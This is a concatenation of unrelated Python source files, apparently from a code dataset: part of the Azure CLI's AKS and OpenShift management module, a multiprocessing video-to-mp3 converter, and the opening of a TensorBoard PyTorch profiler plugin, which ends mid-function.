"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
no_wait=False):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
managed_cluster_client = cf_managed_clusters(cmd.cli_ctx)
return _upgrade_single_nodepool_image_version(no_wait,
managed_cluster_client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
parallel_to_sound.py | import os
from multiprocessing import Process, Queue
import lib.video as video
class Pool:
"""
A pool of video downloaders.
"""
def __init__(self, classes, source_directory, target_directory, num_workers, failed_save_file, no_sound_save_file):
self.classes = classes
self.source_directory = source_directory
self.target_directory = target_directory
self.num_workers = num_workers
self.failed_save_file = failed_save_file
self.no_sound_save_file = no_sound_save_file
self.videos_queue = Queue(100)
self.no_sound_queue = Queue(100)
self.failed_queue = Queue(100)
self.workers = []
self.failed_save_worker = None
self.no_sound_worker = None
def feed_videos(self):
"""
Feed videos to a queue for workers.
:return: None.
"""
if self.classes is None:
videos = os.listdir(self.source_directory)
for filename in videos:
video_path = os.path.join(self.source_directory, filename)
video_id = ".".join(filename.split(".")[:-1])
target_path = os.path.join(self.target_directory, "{}.mp3".format(video_id))
self.videos_queue.put((video_id, video_path, self.target_directory, target_path))
else:
for class_name in self.classes:
source_class_dir = os.path.join(self.source_directory, class_name.replace(" ", "_"))
target_class_dir = os.path.join(self.target_directory, class_name.replace(" ", "_"))
if os.path.isdir(source_class_dir):
if not os.path.isdir(target_class_dir):
# when using multiple processes, the folder might have been already created (after the if was evaluated)
try:
os.makedirs(target_class_dir)
except FileExistsError:
pass
videos = os.listdir(source_class_dir)
for filename in videos:
video_path = os.path.join(source_class_dir, filename)
video_id = ".".join(filename.split(".")[:-1])
target_path = os.path.join(target_class_dir, "{}.mp3".format(video_id))
self.videos_queue.put((video_id, video_path, target_class_dir, target_path))
def start_workers(self):
"""
Start all workers.
:return: None.
"""
# start failed conversions logger
if self.failed_save_file is not None:
self.failed_save_worker = Process(target=write_failed_worker, args=(self.failed_queue, self.failed_save_file))
self.failed_save_worker.start()
# start no sound logger
if self.no_sound_save_file is not None:
self.no_sound_worker = Process(target=write_failed_worker, args=(self.no_sound_queue, self.no_sound_save_file))
self.no_sound_worker.start()
# start download workers
for _ in range(self.num_workers):
worker = Process(target=sound_worker, args=(self.videos_queue, self.failed_queue, self.no_sound_queue))
worker.start()
self.workers.append(worker)
def stop_workers(self):
"""
Stop all workers.
:return: None.
"""
# send end signal to all download workers
for _ in range(len(self.workers)):
self.videos_queue.put(None)
# wait for the processes to finish
for worker in self.workers:
worker.join()
# end failed videos saver
if self.failed_save_worker is not None:
self.failed_queue.put(None)
self.failed_save_worker.join()
if self.no_sound_worker is not None:
self.no_sound_queue.put(None)
self.no_sound_worker.join()
def sound_worker(videos_queue, failed_queue, no_sound_queue):
"""
Process video files.
:param videos_queue: Queue of video paths.
:param failed_queue: Queue for failed videos.
:param no_sound_queue: Queue for videos with no sound.
:return: None.
"""
while True:
request = videos_queue.get()
if request is None:
break
video_id, video_path, target_class_dir, target_path = request
if os.path.isfile(target_path):
continue
if not os.path.isdir(target_class_dir):
os.makedirs(target_class_dir)
if not video.video_has_sound(video_path):
no_sound_queue.put(video_id)
continue
if not video.video_to_sound(video_path, target_path):
failed_queue.put(video_id)
def write_failed_worker(failed_queue, failed_save_file):
"""
Write failed video ids into a file.
:param failed_queue: Queue of failed video ids.
:param failed_save_file: Where to save the videos.
:return: None.
"""
file = open(failed_save_file, "a")
while True:
video_id = failed_queue.get()
if video_id is None:
break
file.write("{}\n".format(video_id))
file.close()
|
plugin.py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
import atexit
import gzip
import json
import os
import shutil
import sys
import tempfile
import threading
import time
from collections import OrderedDict
from queue import Queue
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import exceptions, wrappers
from . import consts, io, utils
from .profiler import RunLoader
from .run import DistributedRunProfile, Run, RunProfile
logger = utils.get_logger()
def decorate_headers(func):
def wrapper(*args, **kwargs):
headers = func(*args, **kwargs)
headers.extend(TorchProfilerPlugin.headers)
return headers
return wrapper
exceptions.HTTPException.get_headers = decorate_headers(exceptions.HTTPException.get_headers)
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
headers = [('X-Content-Type-Options', 'nosniff')]
CONTENT_TYPE = 'application/json'
def __init__(self, context: base_plugin.TBContext):
"""Instantiates TorchProfilerPlugin.
Args:
context: A base_plugin.TBContext instance.
"""
super(TorchProfilerPlugin, self).__init__(context)
self.logdir = io.abspath(context.logdir.rstrip('/'))
self._load_lock = threading.Lock()
self._load_threads = []
self._runs = OrderedDict()
self._runs_lock = threading.Lock()
self._temp_dir = tempfile.mkdtemp()
self._cache = io.Cache(self._temp_dir)
self._queue = Queue()
self._gpu_metrics_file_dict = {}
monitor_runs = threading.Thread(target=self._monitor_runs, name='monitor_runs', daemon=True)
monitor_runs.start()
receive_runs = threading.Thread(target=self._receive_runs, name='receive_runs', daemon=True)
receive_runs.start()
self.diff_run_cache = {}
self.diff_run_flatten_cache = {}
def clean():
logger.debug('starting cleanup...')
self._cache.__exit__(*sys.exc_info())
logger.debug('remove temporary cache directory %s' % self._temp_dir)
shutil.rmtree(self._temp_dir)
atexit.register(clean)
def is_active(self):
"""Returns whether there is relevant data for the plugin to process.
If there is no any pending run, hide the plugin
"""
if self.is_loading:
return True
else:
with self._runs_lock:
return bool(self._runs)
def get_plugin_apps(self):
return {
'/index.js': self.static_file_route,
'/index.html': self.static_file_route,
'/trace_viewer_full.html': self.static_file_route,
'/trace_embedding.html': self.static_file_route,
'/runs': self.runs_route,
'/views': self.views_route,
'/workers': self.workers_route,
'/spans': self.spans_route,
'/overview': self.overview_route,
'/operation': self.operation_pie_route,
'/operation/table': self.operation_table_route,
'/operation/stack': self.operation_stack_route,
'/kernel': self.kernel_pie_route,
'/kernel/table': self.kernel_table_route,
'/kernel/tc_pie': self.kernel_tc_route,
'/trace': self.trace_route,
'/distributed/gpuinfo': self.dist_gpu_info_route,
'/distributed/overlap': self.comm_overlap_route,
'/distributed/waittime': self.comm_wait_route,
'/distributed/commops': self.comm_ops_route,
'/memory': self.memory_route,
'/memory_curve': self.memory_curve_route,
'/memory_events': self.memory_events_route,
'/module': self.module_route,
'/tree': self.op_tree_route,
'/diff': self.diff_run_route,
'/diffnode': self.diff_run_node_route,
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path='/index.js', disable_reload=True)
@wrappers.Request.application
def runs_route(self, request: werkzeug.Request):
with self._runs_lock:
names = list(self._runs.keys())
data = {
'runs': names,
'loading': self.is_loading
}
return self.respond_as_json(data)
@wrappers.Request.application
def views_route(self, request: werkzeug.Request):
name = request.args.get('run')
self._validate(run=name)
run = self._get_run(name)
views_list = [view.display_name for view in run.views]
return self.respond_as_json(views_list)
@wrappers.Request.application
def workers_route(self, request: werkzeug.Request):
name = request.args.get('run')
view = request.args.get('view')
self._validate(run=name, view=view)
run = self._get_run(name)
return self.respond_as_json(run.get_workers(view))
@wrappers.Request.application
def spans_route(self, request: werkzeug.Request):
name = request.args.get('run')
worker = request.args.get('worker')
self._validate(run=name, worker=worker)
run = self._get_run(name)
